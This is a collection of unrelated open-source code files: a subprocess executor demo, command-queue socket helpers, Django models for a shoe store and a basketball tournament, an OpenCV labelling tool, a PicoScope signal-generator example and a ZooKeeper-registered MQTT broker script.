with a non-empty value. The value passed to the `input` keyword will
be written to `stdin` of the subprocess.
Additional keyword parameters passed to this method will
be passed to `AsyncPopen` (and override values passed to this object's
constructor).
"""
if self.stopped(): return
# Merge the keyword arguments together to pass to AsyncPopen
async_popen_dict = self.__async_popen_dict.copy()
async_popen_dict.update(async_popen_keyw)
if input: async_popen_dict["stdin"] = PIPE
# Create the subprocess itself
if self._logger: self._logger.debug("Spawning subprocess %s" % argv)
self.__current_child = AsyncPopen(argv, **async_popen_dict)
if self._logger: self._logger.debug("Spawned subprocess %s with PID %d" % (argv, self.__current_child.pid))
# Listen for both output pipes to close, and push the data to stdin
self.__current_child.obs_add(self._pipe_closed, criteria=PipeDispatcher.PIPE_CLOSED)
if input: self.__current_child.stdin.push_data(str(input))
if __name__ == '__main__':
def printdata(data, pid, channame):
print '[%d] %s %d bytes received: %r' % (pid, channame, len(data), data)
execq = ExecutionQueue()
@execute(execq, SubprocessExecutor)
def spawn_child(argv, data, child, loops):
"""Spawn a cascade of subprocesses."""
for lp in range(1, loops + 1):
(stdout, stderr, stat, pid) = yield {'argv': argv, 'input': '%s%s' % (data, '\n')}
printdata(stdout, pid, 'stdout')
printdata(stderr, pid, 'stderr')
print "Loop %d child %d [%d] exited with status %s" % (lp, child, pid, stat)
if stat == 0 and data == stdout.rstrip()[::-1]: data = stdout[:-1]
def run_child(pause, exitstat):
"""Run the subprocess code; a simple string inverter."""
line = sys.stdin.readline().strip()
sleep(pause / 2.0)
# Write and close both pipes to show that it waits for exit anyway.
print line[::-1]
print >>sys.stderr, line
sys.stdout.close()
sys.stderr.close()
sleep(pause / 2.0)
sys.exit(exitstat)
optparser = optparse.OptionParser(usage=__usage__, version=__version__)
optparser.disable_interspersed_args()
optparser.add_option('--loops', type='int', metavar='N', default=3,
help='Number of times to iterate each child [%default]')
optparser.add_option('--children', type='int', metavar='N', default=3,
help='Number of children to spawn [%default]')
optparser.add_option('--timeout', type='float', metavar='SECONDS', default=10.0,
help='Maximum time subprocess is allowed to run [%default sec]')
optparser.add_option('--no-signal', dest='nosignal', action='store_true', default=False,
help='Ignore signals from child processes.')
childopts = optparse.OptionGroup(optparser, 'Child options')
childopts.add_option('--child', action='store_true', help=optparse.SUPPRESS_HELP)
childopts.add_option('--pause', type='float', metavar='SECONDS', default=2.0,
help='Time to pause in the child process [%default sec]')
childopts.add_option('--exitstat', type='int', metavar='STATUS', default=0,
help='Child exit status [%default]')
optparser.add_option_group(childopts)
(options, args) = optparser.parse_args()
if options.child:
run_child(options.pause, options.exitstat)
else:
# Run the parent process code: start the first child and send data.
if options.nosignal: signal.signal(signal.SIGCHLD, signal.SIG_IGN)
sys.argv.insert(1, '--child')
# Create and queue the children, and then loop asyncore
data = ' '.join(args) if len(args) else digits
for ch in range(1, options.children + 1):
spawn_child(sys.argv, data, ch, options.loops)(timeout=options.timeout)
loop()
os.system('ps -ef')
| 2.6875 | 3 |
funs.py | sjTaylor/cmd_queue | 0 | 12767394 | <gh_stars>0
import struct
import sys
import select
import codes
import logging
import json
import os
def get_logger(name):
logging.basicConfig(format='%(asctime)s | %(name)s | %(levelname)s | %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',
level=logging.DEBUG)
log = logging.getLogger(name=name)
return log
def list_from_file(filename):
thefile = open(filename, 'r')
lst = []
for line in thefile:
lst.append(line.strip())
return lst
class VarList:
def __init__(self, arr=[]):
self.vals = arr
def __getitem__(self, index):
if len(self.vals) is 0:
return None
if len(self.vals) <= index:
return self.vals[-1]
return self.vals[index]
class ClientInterface:
def __init__(self, connection, id, config):
self.con = connection
self.id = id
self.cmdid = -1
self.error = False
self.initialized = False
self.config = config
def initialize(self):
send(self.con, encode(codes.send_config, (self.id, self.config)))
def give_cmd(self, number, command):
self.cmdid = number
send(self.con, encode(codes.send_cmd, (number, command)))
def get_status(self):
pass
def poll(self):
a, b, c = select.select([self.con], [], [], 0)
return len(a) > 0
def send(soc, msg):
totalsent = 0
MSGLEN = len(msg)
while totalsent < MSGLEN:
sent = soc.send(msg[totalsent:])
if sent == 0:
raise RuntimeError("socket connection broken")
totalsent = totalsent + sent
return totalsent
def recv(sock):
msg = b''
MSGLEN = 4
trig = False
while len(msg) < MSGLEN:
chunk = sock.recv(MSGLEN - len(msg))
if chunk == b'':
raise RuntimeError("socket connection broken")
msg = msg + chunk
if len(msg) >= 4 and not trig:
MSGLEN = struct.unpack('i', msg[:4])[0] + 4
trig = True
return msg
def pad(num, padding):
s = str(num)
diff = padding - len(s)
return '0' * diff + s
def do_dir(prefix, padding, out_type, cmd_number):
return os.path.join(prefix, pad(cmd_number, padding) + '-' + out_type + '.txt')
def encode(code, data=None):
ret = struct.pack('i', code)
json_data = {}
if code in [codes.send_config]:
args = data[1]
json_data = {'client_id': data[0],
'working_directory': args.working_directory,
'output_prefix': args.output_directory,
'padding': args.num_digits,
'timeout': args.cmd_timeout}
if code in [codes.send_cmd]:
json_data['command'] = data[1]
json_data['cmd_number'] = data[0]
if code in [codes.finished]:
json_data['cmd_number'] = data[0]
json_data['client_id'] = data[1]
json_data['return_code'] = data[2]
json_string = json.dumps(json_data)
ret += bytearray(json_string.encode('utf-8'))
ret = struct.pack('i', len(ret)) + ret
return ret
def decode(stuff):
stuff = stuff[4:]
code = struct.unpack('i', stuff[0:4])[0]
return code, json.loads(stuff[4:].decode('utf-8'))
def getinput():
ret = []
stuff = True
while stuff:
stuff = False
kbinput, filler, fillertwo = select.select([sys.stdin], [], [], 0)
for qq in kbinput:
ret.append(qq.readline())
stuff = True
return ret
| 2.609375 | 3 |
api/models.py | JavierBarajas552/drf_shoestore_frontend | 0 | 12767395 | <gh_stars>0
from django.db import models
# Create your models here.
class Manufacturer(models.Model):
name = models.CharField(max_length=100)
website = models.URLField()
class ShoeType(models.Model):
style = models.CharField(max_length=20)
class ShoeColor(models.Model):
color_name = models.CharField(max_length=10, choices=[('RED', 'red'), ('ORANGE', 'Orange'), ('YELLO', 'Yello'), ('GREEN', 'Green'), (
'BLUE', 'Blue'), ('INDIGO', 'Indigo'), ('VIOLET', 'Violet'), ('WHITE', 'White'), ('BLACK', 'Black')])
class Shoe(models.Model):
size = models.IntegerField()
brand_name = models.CharField(max_length=100)
manufacturer = models.ForeignKey(Manufacturer, on_delete=models.CASCADE)
color = models.ForeignKey(ShoeColor, on_delete=models.CASCADE)
material = models.CharField(max_length=100)
shoe_type = models.ForeignKey(ShoeType, on_delete=models.CASCADE)
fasten_type = models.CharField(max_length=50)
| 2.375 | 2 |
labeller/rectangle-labeler-image.py | EveCharbie/rectangle-labelling | 0 | 12767396 | <reponame>EveCharbie/rectangle-labelling<filename>labeller/rectangle-labeler-image.py<gh_stars>0
import cv2
import numpy as np
from tqdm.notebook import tqdm
import pickle
def draw_points_and_lines():
global points_labels, circle_colors, circle_radius, iFrame, image, clone, active_points, rectangle_color
clone = image.copy()
for i in range(len(active_points)):
if active_points[i] == True:
mouse_click_position = (int(points_labels[label_keys[i]][0, iFrame]), int(points_labels[label_keys[i]][1, iFrame]))
cv2.circle(clone, mouse_click_position, circle_radius, color=circle_colors[i], thickness=-1) # clone
for j in neighbors[i]:
if active_points[j] == True:
line_position = (int(points_labels[label_keys[j]][0, iFrame]), int(points_labels[label_keys[j]][1, iFrame]))
cv2.line(clone, mouse_click_position, line_position, rectangle_color, thickness=1) # clone
return
def circle_positioning(event, x, y, flags, param):
global points_labels, current_click, iFrame
if event == cv2.EVENT_LBUTTONDOWN:
points_labels[label_keys[current_click]][:, iFrame] = np.array([x, y])
draw_points_and_lines()
return
def left_front_corner_choice(*args):
global current_click
current_click = 0
active_points[0] = True
active_points[4] = False
print('current_click : ', current_click)
return
def right_front_corner_choice(*args):
global current_click
current_click = 1
active_points[1] = True
active_points[5] = False
print('current_click : ', current_click)
return
def right_back_corner_choice(*args):
global current_click
current_click = 2
active_points[2] = True
active_points[6] = False
print('current_click : ', current_click)
return
def left_back_corner_choice(*args):
global current_click
current_click = 3
active_points[3] = True
active_points[7] = False
print('current_click : ', current_click)
return
def left_front_border_choice(*args):
global current_click
current_click = 4
active_points[4] = True
active_points[0] = False
print('current_click : ', current_click)
return
def right_front_border_choice(*args):
global current_click
current_click = 5
active_points[5] = True
active_points[1] = False
print('current_click : ', current_click)
return
def right_back_border_choice(*args):
global current_click
current_click = 6
active_points[6] = True
active_points[2] = False
print('current_click : ', current_click)
return
def left_back_border_choice(*args):
global current_click
current_click = 7
active_points[7] = True
active_points[3] = False
print('current_click : ', current_click)
return
frames = np.array([0])
points_labels = {"left_front_corner": np.zeros((2, len(frames))),
"right_front_corner": np.zeros((2, len(frames))),
"right_back_corner": np.zeros((2, len(frames))),
"left_back_corner": np.zeros((2, len(frames))),
"left_front_border": np.zeros((2, len(frames))),
"right_front_border": np.zeros((2, len(frames))),
"right_back_border": np.zeros((2, len(frames))),
"left_back_border": np.zeros((2, len(frames)))}
label_keys = [key for key in points_labels.keys()]
current_click = None
active_points = [False for i in range(8)]
iFrame = 0
neighbors = [[1, 5, 3, 7],
[0, 4, 2, 6],
[1, 5, 3, 7],
[0, 4, 2, 6],
[1, 5, 3, 7],
[0, 4, 2, 6],
[1, 5, 3, 7],
[0, 4, 2, 6],]
circle_radius = 5
rectangle_color = (100, 100, 100)
circle_colors = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 0), rectangle_color, rectangle_color, rectangle_color, rectangle_color]
Image_name = "Image_bidon.png"
############################### code beginning #######################################################################
global clone
# image = cv2.imread('../input/PI world v1 ps1_181.jpg')
file = open(f"../output/PI world v1 ps1_181_undistorted_images.pkl", "rb")
image = pickle.load(file)
clone = image.copy()
cv2.namedWindow(Image_name)
cv2.createButton("Left Front Corner (LFC)", left_front_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Front Corner (RFC)", right_front_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Back Corner (RBC)", right_back_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Left Back Corner (LBC)", left_back_corner_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Left Front Border (LFB)", left_front_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Front Border (RFB)", right_front_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Right Back Border (RBB)", right_back_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.createButton("Left Back Border (LBB)", left_back_border_choice, None, cv2.QT_PUSH_BUTTON, 0)
cv2.setMouseCallback(Image_name, circle_positioning)
while True:
ratio_image = 1.5
width, height, rgb = np.shape(clone)
small_image = cv2.resize(clone, (int(round(width / ratio_image)), int(round(height / ratio_image))))
cv2.imshow(Image_name, small_image)
key = cv2.waitKey(1) & 0xFF
cv2.destroyAllWindows()
| 2.34375 | 2 |
Geolocation/Data/Design2a/design2a_11k_test5/pilot.0000/rp_install/lib/python2.7/site-packages/radical/utils/zmq/utils.py | radical-experiments/iceberg_escience | 1 | 12767397 | <reponame>radical-experiments/iceberg_escience
import os
import msgpack
import radical.utils as ru
# ------------------------------------------------------------------------------
#
def get_channel_url(ep_type, channel=None, url=None):
'''
For the given endpoint type, ensure that both channel name and endpoint URL
are known. If they are not, raise a ValueError exception.
For a given URL, the channel is derived as path element of that URL
(leading `/` is stripped).
For a given channel channel name, the URL is searched in the process
environment (under uppercase version of `<CHANNEL>_<EPTYPE>_URL`). If not
found, the method will look if a config file with the name `<channel>.cfg`
exists, and if it has a top level entry named `<ep_type>` (lower case).
Before returning the given or derived channel and url, the method will check
if both data match (i.e. if the channel name is reflected in the URL)
'''
if not channel and not url:
raise ValueError('need either channel name or URL')
if not channel:
# get channel from path element of URL
# example:
# channel `foo`
# url `pubsub://localhost:1234/foo`
channel = os.path.basename(ru.Url(url.path))
elif not url:
# get url from environment (`FOO_PUB_URL`) or config file (`foo.cfg`)
env_name = '%s_%s_URL' % (channel.upper(), ep_type.upper())
cfg_name = './%s.cfg' % channel.lower()
if env_name in os.environ:
url = os.environ[env_name]
elif os.exists(cfg_name):
with open(cfg_name, 'r') as fin:
for line in fin.readlines():
_ep_type, _url = line.split(':')
if _ep_type.strip().upper() == ep_type.upper():
url = _url
break
# sanity checks
if not url:
raise ValueError('no URL for %s channel %s' % (channel, ep_type))
if not channel:
raise ValueError('no %s channel for URL %s' % (ep_type, url))
if channel.lower() != ru.Url(url).path.lstrip('/').lower():
raise ValueError('%s channel (%s) / url (%s) mismatch'
% (ep_type, channel, url))
return channel, url
# ------------------------------------------------------------------------------
#
def log_bulk(log, bulk, token):
if hasattr(bulk, 'read'):
bulk = msgpack.unpack(bulk)
if not bulk:
# log.debug("%s: None", token)
return
if not isinstance(bulk, list):
bulk = [bulk]
if isinstance(bulk[0], dict) and 'arg' in bulk[0]:
bulk = [e['arg'] for e in bulk]
if isinstance(bulk[0], dict) and 'uid' in bulk[0]:
for e in bulk:
log.debug("%s: %s [%s]", token, e['uid'], e.get('state'))
else:
for e in bulk:
log.debug("%s: %s", token, str(e)[0:32])
# ------------------------------------------------------------------------------
| 2.515625 | 3 |
ps2000aExamples/ps2000aSigGen.py | joe-jordan/picosdk-python-wrappers | 0 | 12767398 | <filename>ps2000aExamples/ps2000aSigGen.py<gh_stars>0
#
# Copyright (C) 2018 Pico Technology Ltd. See LICENSE file for terms.
#
# PS2000a SIGNAL GENERATOR EXAMPLE
# This example opens a 2000a driver device, sets up the singal generator to produce a sine wave, then a a square wave
# then perform a sweep of a square wave signal
import ctypes
from picosdk.ps2000a import ps2000a as ps
import time
from picosdk.functions import assert_pico_ok
# Gives the device a handle
status = {}
chandle = ctypes.c_int16()
# Opens the device/s
status["openunit"] = ps.ps2000aOpenUnit(ctypes.byref(chandle), None)
try:
assert_pico_ok(status["openunit"])
except:
# powerstate becomes the status number of openunit
powerstate = status["openunit"]
# If powerstate is the same as 282 then it will run this if statement
if powerstate == 282:
# Changes the power input to "PICO_POWER_SUPPLY_NOT_CONNECTED"
status["ChangePowerSource"] = ps.ps2000aChangePowerSource(chandle, 282)
# If the powerstate is the same as 286 then it will run this if statement
elif powerstate == 286:
# Changes the power input to "PICO_USB3_0_DEVICE_NON_USB3_0_PORT"
status["ChangePowerSource"] = ps.ps2000aChangePowerSource(chandle, 286)
else:
raise
assert_pico_ok(status["ChangePowerSource"])
# Generates Sine signal with a 2V pkToPk with a 10KHz frequency
# handle = chandle
# offsetVoltage = 0
# pkToPk = 2000000
# waveType = ctypes.c_int16(0) = PS2000a_SINE
# startFrequency = 10000 Hz
# stopFrequency = 10000 Hz
# increment = 0
# dwellTime = 1
# sweepType = ctypes.c_int16(1) = PS2000a_UP
# operation = 0
# shots = 0
# sweeps = 0
# triggerType = ctypes.c_int16(1) = PS2000a_SIGGEN_NONE
# triggerSource = ctypes.c_int16(1) = P2000a_SIGGEN_NONE
# extInThreshold = 1
wavetype = ctypes.c_int16(0)
sweepType = ctypes.c_int32(0)
triggertype = ctypes.c_int32(0)
triggerSource = ctypes.c_int32(0)
status["SetSigGenBuiltIn"] = ps.ps2000aSetSigGenBuiltIn(chandle, 0, 2000000, wavetype, 10000, 10000, 0, 1, sweepType, 0, 0, 0, triggertype, triggerSource, 1)
assert_pico_ok(status["SetSigGenBuiltIn"])
# pauses the script to show signal
time.sleep(10)
# Generates Sqaure signal with a 2V pkToPk
# handle = chandle
# offsetVoltage = -1000000
# pkToPk = 1500000
# waveType = ctypes.c_int16(1) = PS2000a_Sqaure
# startFrequency = 10000 Hz
# stopFrequency = 10000 Hz
# increment = 0
# dwellTime = 1
# sweepType = ctypes.c_int16(1) = PS2000a_UP
# operation = 0
# shots = 0
# sweeps = 0
# triggerType = ctypes.c_int16(1) = PS2000a_SIGGEN_NONE
# triggerSource = ctypes.c_int16(1) = P2000a_SIGGEN_NONE
# extInThreshold = 1
wavetype = ctypes.c_int16(1)
sweepType = ctypes.c_int32(0)
triggertype = ctypes.c_int32(0)
triggerSource = ctypes.c_int32(0)
status["SetSigGenBuiltIn"] = ps.ps2000aSetSigGenBuiltIn(chandle, 0, 2000000, wavetype, 10000, 10000, 0, 1, sweepType, 0, 0, 0, triggertype, triggerSource, 1)
assert_pico_ok(status["SetSigGenBuiltIn"])
# pauses the script to show signal
time.sleep(10)
# Generates sqaure signal with a up down sweep, starting at 10-100 in 5KHz increments every 1 second.
# handle = chandle
# offsetVoltage = -1000000
# pkToPk = 1500000
# waveType = ctypes.c_int16(1) = PS2000a_Square
# startFrequency = 10000 Hz
# stopFrequency = 100000 Hz
# increment = 5
# dwellTime = 1
# sweepType = ctypes.c_int16(1) = PS2000a_UP
# operation = 0
# shots = 0
# sweeps = 0
# triggerType = ctypes.c_int16(1) = PS2000a_SIGGEN_NONE
# triggerSource = ctypes.c_int16(1) = P2000a_SIGGEN_NONE
# extInThreshold = 1
wavetype = ctypes.c_int16(1)
sweepType = ctypes.c_int32(2)
triggertype = ctypes.c_int32(0)
triggerSource = ctypes.c_int32(0)
status["SetSigGenBuiltIn"] = ps.ps2000aSetSigGenBuiltIn(chandle, 0, 2000000, wavetype, 10000, 100000, 5, 1, sweepType, 0, 0, 0, triggertype, triggerSource, 1)
assert_pico_ok(status["SetSigGenBuiltIn"])
# pauses the script to show signal
time.sleep(36)
# Stops the scope
# Handle = chandle
status["stop"] = ps.ps2000aStop(chandle)
assert_pico_ok(status["stop"])
# Closes the unit
# Handle = chandle
status["close"] = ps.ps2000aCloseUnit(chandle)
assert_pico_ok(status["close"])
# Displays the staus returns
print(status) | 2.46875 | 2 |
src/pytorch_metric_learning/losses/signal_to_noise_ratio_losses.py | wconnell/pytorch-metric-learning | 1 | 12767399 | <reponame>wconnell/pytorch-metric-learning<gh_stars>1-10
from ..utils import common_functions as c_f
from .contrastive_loss import ContrastiveLoss
from ..distances import SNRDistance
class SignalToNoiseRatioContrastiveLoss(ContrastiveLoss):
def __init__(self,**kwargs):
super().__init__(**kwargs)
c_f.assert_distance_type(self, SNRDistance)
def get_default_distance(self):
return SNRDistance() | 2.46875 | 2 |
shop/urls.py | sling254/swAPP | 0 | 12767400 | <filename>shop/urls.py
from django.urls import path
from .views import IndexView,ProductsView,CheckoutView,UpdateView,CartView, suppliersView
urlpatterns = [
path('', IndexView, name='index'),
path('products/', ProductsView, name='products'),
path('checkout/', CheckoutView, name='checkout'),
path('suppliers/' ,suppliersView,name='suppliers'),
path('update_item/', UpdateView, name='update_item'),
path('cart/', CartView, name='cart'),
] | 1.84375 | 2 |
4-static-methods-0.py | Otumian-empire/My-PyClasses | 0 | 12767401 | <reponame>Otumian-empire/My-PyClasses<gh_stars>0
# static methods
# use the staticmethod decorator
class Human:
@staticmethod
def speak():
print("I can speak")
Human().speak()
me = Human()
me.speak() # this line will give error
# expected an error.. but there isn't any
# static methods can be called on an instance of a class
# i didn't pass self or any argument to the static method
# there are other cracked gette and setters.. shitty as it may seem
# i don't like it
| 3.015625 | 3 |
mqtt_broker/main.py | drtinao/KIV-DS-4HW | 0 | 12767402 | <reponame>drtinao/KIV-DS-4HW
from kazoo.client import KazooClient
import time
import sys
import logging
import socket # for working with network con
import subprocess
# constants - START
PARENT_NODE = "mqtt_brokers_list"
NODE_NAME = "mqtt_node"
PARENT_NODE_MQTT_CLIENT = "mqtt_clients_list"
TIMEOUT_CON_ZOOKEEPER = 100000 # timeout within which connection to zookeeper should be established, seconds
# constants - END
# Returns hostname of the current machine.
def get_node_hostname():
try:
node_hostname = socket.gethostname()
return node_hostname
except:
print('Error while getting node hostname')
sys.stdout.flush()
# Returns IP of the current machine.
# node_hostname - hostname of the machine
def get_node_ip(node_hostname):
try:
node_ip = socket.gethostbyname(node_hostname)
return node_ip
except:
print("Error while getting node IP")
sys.stdout.flush()
# connect to zookeeper server - START
logging.basicConfig()
zookeeper_servers = ['10.0.1.101:2181', '10.0.1.102:2181', '10.0.1.103:2181'] # IPs + ports of available zookeeper servers
kazooClient = KazooClient(hosts=zookeeper_servers)
kazooClient.start(timeout=TIMEOUT_CON_ZOOKEEPER)
# connect to zookeeper server - END
# create root node with brokers if not yet present - START
if not kazooClient.exists(PARENT_NODE):
kazooClient.create(PARENT_NODE, ephemeral=False, sequence=False)
print("BROKER CREATED PARENT ZOOKEEPER NODE WITH NAME: " + str(PARENT_NODE))
sys.stdout.flush()
# create root node with brokers if not yet present - END
# create root node with clients if not yet present - START
if not kazooClient.exists(PARENT_NODE_MQTT_CLIENT):
kazooClient.create(PARENT_NODE_MQTT_CLIENT, ephemeral=False, sequence=False)
print("BROKER CREATED PARENT ZOOKEEPER NODE WITH NAME: " + str(PARENT_NODE_MQTT_CLIENT))
sys.stdout.flush()
# create root node with clients if not yet present - END
# create children node for the broker with IP values
kazooClient.create(path=PARENT_NODE + '/' + NODE_NAME, value=get_node_ip(get_node_hostname()), ephemeral=True, sequence=True)
print("BROKER CREATED EPHEMERAL ZOOKEEPER NODE: " + str(PARENT_NODE) + str('/') + str(NODE_NAME))
# keep process up to let zookeeper know...
while True:
p = subprocess.Popen(["/bin/bash", "-c", "pgrep mosquitto"], stdout=subprocess.PIPE)
result = p.communicate()[0]
if len(result) == 0: # exit if mosquitto is down...
exit()
time.sleep(5) | 2.3125 | 2 |
test/functional/test-framework/log/base_log.py | josehu07/open-cas-linux-mf | 2 | 12767403 | <gh_stars>1-10
#
# Copyright(c) 2019-2020 Intel Corporation
# SPDX-License-Identifier: BSD-3-Clause-Clear
#
from enum import Enum
from re import sub
class BaseLogResult(Enum):
DEBUG = 10
PASSED = 11
WORKAROUND = 12
WARNING = 13
SKIPPED = 14
FAILED = 15
EXCEPTION = 16
BLOCKED = 17
CRITICAL = 18
def escape(msg):
return sub(u'[^\u0020-\uD7FF\u0009\u000A\u000D\uE000-\uFFFD\U00010000-\U0010FFFF]+', '', msg)
class BaseLog():
def __init__(self, begin_message=None):
self.__begin_msg = begin_message
self.__result = BaseLogResult.PASSED
def __enter__(self):
if self.__begin_msg is not None:
self.begin(self.__begin_msg)
else:
self.begin("Start BaseLog ...")
def __exit__(self, *args):
self.end()
def __try_to_set_new_result(self, new_result):
if new_result.value > self.__result.value:
self.__result = new_result
def begin(self, message):
pass
def debug(self, message):
pass
def info(self, message):
pass
def workaround(self, message):
self.__try_to_set_new_result(BaseLogResult.WORKAROUND)
def warning(self, message):
self.__try_to_set_new_result(BaseLogResult.WARNING)
def skip(self, message):
self.__try_to_set_new_result(BaseLogResult.SKIPPED)
def error(self, message):
self.__try_to_set_new_result(BaseLogResult.FAILED)
def blocked(self, message):
self.__try_to_set_new_result(BaseLogResult.BLOCKED)
def exception(self, message):
self.__try_to_set_new_result(BaseLogResult.EXCEPTION)
def critical(self, message):
self.__try_to_set_new_result(BaseLogResult.CRITICAL)
def end(self):
return self.__result
def get_result(self):
return self.__result
| 2.109375 | 2 |
aktools/api_debug/local_debug.py | xiaoguangge/aktools | 1 | 12767404 | # -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Date: 2021/12/9 19:09
Desc: HTTP 测试
"""
import requests
import pandas as pd
url = "http://1172.16.17.32:8080/api/stock_financial_hk_analysis_indicator_em"
params = {
"stock": "00700",
"indicator": "年度"
}
r = requests.get(url, params=params)
temp_df = pd.DataFrame.from_dict(r.json())
print(temp_df)
| 3.375 | 3 |
aula7_classes_calculadora2.py | clovisdanielcosta/dio-python | 0 | 12767405 | # Sem passar valores pelo init
class Calculadora:
# def __init__(self):
# pass
def soma(self, valor_a, valor_b):
return valor_a + valor_b
def subtracao(self, valor_a, valor_b):
return valor_a - valor_b
def multiplicacao(self, valor_a, valor_b):
return valor_a * valor_b
def divisao(self, valor_a, valor_b):
return valor_a / valor_b
if __name__ == '__main__':
# Instanciando uma classe
calculadora = Calculadora()
print(calculadora.soma(10, 2))
print(calculadora.subtracao(10, 2))
print(calculadora.multiplicacao(10, 2))
print(calculadora.divisao(10, 2)) | 3.734375 | 4 |
skeleton/models.py | l99fiamingo/ioniCup | 1 | 12767406 | from django.db import models
from django.core.validators import MinValueValidator, MaxValueValidator
from django.template.defaultfilters import slugify
# Create your models here.
class Tournament(models.Model):
year = models.CharField(max_length=99)
title = models.CharField(max_length=99, blank=True)
slug = models.SlugField(blank=True)
active = models.BooleanField(default=False)
def save(self, *args, **kwargs):
self.slug = slugify(self.year + ' ' + self.title)
super(Tournament, self).save(*args, **kwargs)
def __str__(self):
return self.year
class Team(models.Model):
COLORS = (
('Black', 'Nero'),
('Silver', 'Argento'),
('Gray', 'Grigio'),
('White', 'Bianco'),
('Maroon', 'Amaranto'),
('Red', 'Rosso'),
('Orange', 'Arancione'),
('Purple', 'Viola'),
('Fuchsia', 'Fucsia'),
('Green', 'Verde Scuro'),
('Lime', ' Verde Lime'),
('Yellow', 'Giallo'),
('Navy', 'Blue Navy'),
('Blue', 'Blu'),
('Teal', 'Verde Acqua'),
('Azure', 'Azzurro'),
('Pink', 'Rosa'))
tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, null=True, related_name='teams')
name = models.CharField(max_length=999)
short_name = models.CharField(max_length=12, blank=True)
city = models.CharField(max_length=36, blank=True)
slug = models.SlugField(blank=True)
color = models.CharField(max_length=16, choices=COLORS, default='White', blank=True)
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
self.name = self.name.title()
self.short_name = self.short_name.title()
self.city = self.city.title()
super(Team, self).save(*args, **kwargs)
def __str__(self):
return self.name
class AllStarGame(models.Model):
name = models.CharField(max_length=16)
rules = models.CharField(max_length=999, blank=True)
slug = models.SlugField(blank=True)
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(AllStarGame, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Human(models.Model):
SHIRT_SIZES = (('XXS', 'XXS'), ('XS', 'XS'), ('S', 'S'), ('M', 'M'), ('L', 'L'), ('XL', 'XL'), ('XXL', 'XXL'))
first_name = models.CharField(max_length=16)
last_name = models.CharField(max_length=16)
jersey_size = models.CharField(max_length=4, choices=SHIRT_SIZES, blank=True)
slug = models.SlugField(blank=True)
def save(self, *args, **kwargs):
self.slug = slugify(self.first_name + ' ' + self.last_name)
self.first_name = self.first_name.title()
self.last_name = self.last_name.title()
super(Human, self).save(*args, **kwargs)
def __str__(self):
return self.first_name + ' ' + self.last_name
class Player(Human):
team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='players')
year_of_birth = models.IntegerField(validators=[MinValueValidator(1900), MaxValueValidator(2100)], blank=True, null=True)
jersey_number = models.IntegerField(validators=[MinValueValidator(0), MaxValueValidator(999)], blank=True, null=True)
all_star_game = models.ForeignKey(AllStarGame, on_delete=models.SET_NULL, blank=True, null=True, related_name='players')
class Coach(Human):
team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='coaches')
cell_number = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
email = models.EmailField(max_length=64, blank=True, null=True)
class Stage(models.Model): # Fase
name = models.CharField(max_length=16, blank=True)
tournament = models.ForeignKey(Tournament, on_delete=models.CASCADE, related_name='stages')
precedent_stage = models.OneToOneField('self', on_delete=models.SET_NULL, blank=True, null=True, related_name='next_stage')
protected = models.BooleanField(default=False)
def __str__(self):
return self.name
class Group(models.Model): # Girone
name = models.CharField(max_length=16, blank=True)
FORMAT_TYPES = (('Round-Robin', "All'italiana"), ('Elimination', 'Ad eliminazione'))
stage = models.ForeignKey(Stage, on_delete=models.CASCADE, related_name='groups')
format = models.CharField(max_length=32, choices=FORMAT_TYPES, default='Round-Robin')
number_of_teams = models.IntegerField(validators=[MinValueValidator(0)], default=0)
importance = models.IntegerField(validators=[MinValueValidator(0)], default=0)
def __str__(self):
return self.name + ' - ' + self.stage.name
class Round(models.Model): # Giornata
round = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
group = models.ForeignKey(Group, on_delete=models.CASCADE, related_name='rounds')
def __str__(self):
return str(self.round)
class Match(models.Model): # Partita
SIXTHS = (('1', 'Primo Tempo'), ('2', 'Secondo Tempo'), ('3', 'Terzo Tempo'), ('4', 'Quarto Tempo'), ('5', 'Quinto Tempo'), ('6', 'Sesto Tempo'), ('7', 'Supplementare'))
COLORS = (
('Black', 'Nero'),
('Silver', 'Argento'),
('Gray', 'Grigio'),
('White', 'Bianco'),
('Maroon', 'Amaranto'),
('Red', 'Rosso'),
('Orange', 'Arancione'),
('Purple', 'Viola'),
('Fuchsia', 'Fucsia'),
('Green', 'Verde Scuro'),
('Lime', ' Verde Lime'),
('Yellow', 'Giallo'),
('Navy', 'Blue Navy'),
('Blue', 'Blu'),
('Teal', 'Verde Acqua'),
('Azure', 'Azzurro'),
('Pink', 'Rosa'))
round = models.ForeignKey(Round, on_delete=models.CASCADE, blank=True, related_name='matches')
team_A = models.ForeignKey(Team, on_delete=models.CASCADE, blank=True, null=True, related_name='matches_A')
points_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
team_B = models.ForeignKey(Team, on_delete=models.CASCADE, blank=True, null=True, related_name='matches_B')
points_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
time = models.ForeignKey('Time', on_delete=models.SET_NULL, blank=True, null=True, related_name='matches')
court = models.ForeignKey('Court', on_delete=models.SET_NULL, blank=True, null=True, related_name='matches')
number = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_current_sixth = models.CharField(max_length=16, choices=SIXTHS, blank=True)
sb_timer = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_partial_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_partial_B = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
sb_1_sixth_A = models.IntegerField(validators=[MinValueValidator(0)], blank=True, null=True)
